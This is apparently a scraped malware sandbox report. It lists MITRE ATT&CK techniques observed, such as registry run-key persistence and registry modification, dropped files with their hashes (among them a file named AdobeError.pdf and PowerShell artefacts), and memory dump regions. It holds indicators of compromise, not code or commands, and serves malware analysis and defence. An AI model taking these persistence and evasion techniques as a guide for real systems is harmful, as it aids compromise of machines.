Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
3a6c4d4c70ad87eeec864a6825fcf669

SHA1
b45ca5804ddc1f747b8f4e80ac2a69db2e40f304

SHA256
c317e350d80df62e0a7d5d9b2b9c1d39d584c31a3a2d6d618908c03ad08d7b7f

SHA512
59447a0fa4d930ae19ab5f2652f75952336385d0e76d4d79fc8fe707a5de0d040a6a24fa9db01649d5a8b2a28fe96fc43339f0410d8d1581548b729c27dc725a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize
471B

MD5
fe3bccbe15a99426d2b353ffdac034c4

SHA1
37f90fa27cc749eb5b6c5abe4c6d16877dc43652

SHA256
fe3b8accc0c2b96845d79df1080aa747f88e8f0f20e9d879ec461997c8d8221f

SHA512
33144b71582a006987a324e7a25c05f5b807d3de2ccf952c67831c2f6a15692726070634b0f2b01b93c5964a89da1d0e3733f05e7b0dbe152f3b04fb7721966c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize
400B

MD5
2555f670ae33675fc9294cef348e8769

SHA1
0ccffd842685feef4fd4605a7d2aac76fb375859

SHA256
bd9eafaee6646c7eaab903bc9e7c44f0cb0a88d817a92cf61e913cf842acd90f

SHA512
44306bbe003d8efb80ca30c67acca6743118d889bbb611a3a227060a9f493baf63fbcd7ba2e96c4c66b7d289a302dc1a132534a327cb5106f8eef6dd90e999c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a1127a05777a6f6c786c6a35dc63830c

SHA1
8ab0c43d07c1f85424b1930c5a8d8450a1308beb

SHA256
895bfb1a8cccd1f8453564f85f83ed786a23d7c3f10e444a8a91c4e680bd2e23

SHA512
0625a4e211c1508ebb60a031d0479348638191315cb31763c9a5d7cc63a380078d6bd1377a012a1d8f801897d46d73372675152da3051691140404be2c481819

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a316ebd4efa11d6b6daf6af0cc1aebce

SHA1
ab338dd719969c70590dbc039b90e2758c741762

SHA256
f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014

SHA512
67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a316ebd4efa11d6b6daf6af0cc1aebce

SHA1
ab338dd719969c70590dbc039b90e2758c741762

SHA256
f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014

SHA512
67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AdobeError.pdf
Filesize
56KB

MD5
d7f8acc23447803e1066bf68c94df562

SHA1
19abc068947bfbe92b259401c31cd622cc586334

SHA256
ebedad982f57e95005c13bb5dd0331fe7417f977ae20ec531b7ca1bfe01e99a0

SHA512
ff858a3d5068018b362742179650999639867e52d88abc05890ae11da3914e2414de8d9bfe25525b1418a30bd501b7587cffd3ff08fb3bac0bd2dacb6a6d4b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsuqx5cr.bjn.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Spas.urf
Filesize
249KB

MD5
82c51982f6dd09da63906870cffde2aa

SHA1
cdf4d11a4b0718dc8c04c20ee5e01f8830563c15

SHA256
adbe94aa293ebb173e2a7f521f6dae35fa37daa14ae0cb683d41b8a152d81dea

SHA512
00ee38d0ca94754d68933fe70895bc177c17c6598f7d0a03b8db43f76a65b86c8578f29dc4b875143032416bae88419cbf1e9e97ec67cb1dbfe7015536b417c3

Download Submit
memory/564-373-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/564-380-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/564-381-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/564-374-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/564-382-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/1160-316-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/1160-302-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/1160-315-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/1160-301-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/1684-370-0x0000021277780000-0x0000021277790000-memory.dmp

Filesize
64KB

Download
memory/1684-369-0x0000021277780000-0x0000021277790000-memory.dmp

Filesize
64KB

Download
memory/1684-355-0x0000021277780000-0x0000021277790000-memory.dmp

Filesize
64KB

Download
memory/1684-354-0x0000021277780000-0x0000021277790000-memory.dmp

Filesize
64KB

Download
memory/2144-309-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/2144-308-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/2144-277-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/2144-276-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/2528-326-0x0000000000E00000-0x0000000002235000-memory.dmp

Filesize
20.2MB

Download
memory/2528-310-0x0000000000E00000-0x0000000002235000-memory.dmp

Filesize
20.2MB

Download
memory/2528-311-0x0000000000E00000-0x0000000002235000-memory.dmp

Filesize
20.2MB

Download
memory/2528-327-0x0000000000E00000-0x0000000002235000-memory.dmp

Filesize
20.2MB

Download
memory/2528-328-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/2540-306-0x0000026F64600000-0x0000026F64610000-memory.dmp

Filesize
64KB

Download
memory/2540-305-0x0000026F64600000-0x0000026F64610000-memory.dmp

Filesize
64KB

Download
memory/2540-307-0x0000026F64600000-0x0000026F64610000-memory.dmp

Filesize
64KB

Download
memory/2540-265-0x0000026F64600000-0x0000026F64610000-memory.dmp

Filesize
64KB

Download
memory/2540-266-0x0000026F64600000-0x0000026F64610000-memory.dmp

Filesize
64KB

Download
memory/2820-318-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/2820-319-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/2820-335-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/2820-336-0x00000000007B0000-0x0000000001BE5000-memory.dmp

Filesize
20.2MB

Download
memory/2820-337-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3244-169-0x000001A76A5A0000-0x000001A76A5B0000-memory.dmp

Filesize
64KB

Download
memory/3244-144-0x000001A76A5A0000-0x000001A76A5B0000-memory.dmp

Filesize
64KB

Download
memory/3244-167-0x000001A76A5A0000-0x000001A76A5B0000-memory.dmp

Filesize
64KB

Download
memory/3244-168-0x000001A76A5A0000-0x000001A76A5B0000-memory.dmp

Filesize
64KB

Download
memory/3244-143-0x000001A76A5A0000-0x000001A76A5B0000-memory.dmp

Filesize
64KB

Download
memory/3244-133-0x000001A76C820000-0x000001A76C842000-memory.dmp

Filesize
136KB

Download
memory/3568-371-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/3568-372-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/3568-365-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/3568-366-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/3872-290-0x000002BC99A00000-0x000002BC99A10000-memory.dmp

Filesize
64KB

Download
memory/3872-313-0x000002BC99A00000-0x000002BC99A10000-memory.dmp

Filesize
64KB

Download
memory/3872-314-0x000002BC99A00000-0x000002BC99A10000-memory.dmp

Filesize
64KB

Download
memory/3872-291-0x000002BC99A00000-0x000002BC99A10000-memory.dmp

Filesize
64KB

Download
memory/3872-312-0x000002BC99A00000-0x000002BC99A10000-memory.dmp

Filesize
64KB

Download
memory/4344-175-0x0000000006D40000-0x0000000006D41000-memory.dmp

Filesize
4KB

Download
memory/4344-150-0x0000000005370000-0x00000000053D6000-memory.dmp

Filesize
408KB

Download
memory/4344-172-0x0000000002210000-0x0000000002220000-memory.dmp

Filesize
64KB

Download
memory/4344-165-0x0000000006DA0000-0x0000000006DC2000-memory.dmp

Filesize
136KB

Download
memory/4344-164-0x0000000006DF0000-0x0000000006E86000-memory.dmp

Filesize
600KB

Download
memory/4344-163-0x0000000006C80000-0x0000000006C9A000-memory.dmp

Filesize
104KB

Download
memory/4344-162-0x00000000072D0000-0x000000000794A000-memory.dmp

Filesize
6.5MB

Download
memory/4344-161-0x0000000005B60000-0x0000000005B7E000-memory.dmp

Filesize
120KB

Download
memory/4344-151-0x0000000005450000-0x00000000054B6000-memory.dmp

Filesize
408KB

Download
memory/4344-166-0x0000000009340000-0x00000000098E4000-memory.dmp

Filesize
5.6MB

Download
memory/4344-149-0x00000000052D0000-0x00000000052F2000-memory.dmp

Filesize
136KB

Download
memory/4344-148-0x0000000002210000-0x0000000002220000-memory.dmp

Filesize
64KB

Download
memory/4344-147-0x0000000002210000-0x0000000002220000-memory.dmp

Filesize
64KB

Download
memory/4344-146-0x0000000004C70000-0x0000000005298000-memory.dmp

Filesize
6.2MB

Download
memory/4344-145-0x0000000004600000-0x0000000004636000-memory.dmp

Filesize
216KB

Download
memory/4344-173-0x0000000002210000-0x0000000002220000-memory.dmp

Filesize
64KB

Download
memory/4344-174-0x0000000007950000-0x0000000008D85000-memory.dmp

Filesize
20.2MB

Download
memory/4796-178-0x0000000001280000-0x00000000026B5000-memory.dmp

Filesize
20.2MB

Download
memory/4796-340-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-341-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-342-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-343-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-330-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-317-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-304-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-253-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-252-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-368-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-251-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-250-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-249-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-228-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-200-0x0000000001280000-0x00000000026B5000-memory.dmp

Filesize
20.2MB

Download
memory/4796-199-0x0000000001280000-0x00000000026B5000-memory.dmp

Filesize
20.2MB

Download
memory/4796-375-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-195-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-190-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-177-0x0000000001280000-0x00000000026B5000-memory.dmp

Filesize
20.2MB

Download
memory/4796-384-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-385-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-386-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-387-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-388-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-389-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-390-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4796-391-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download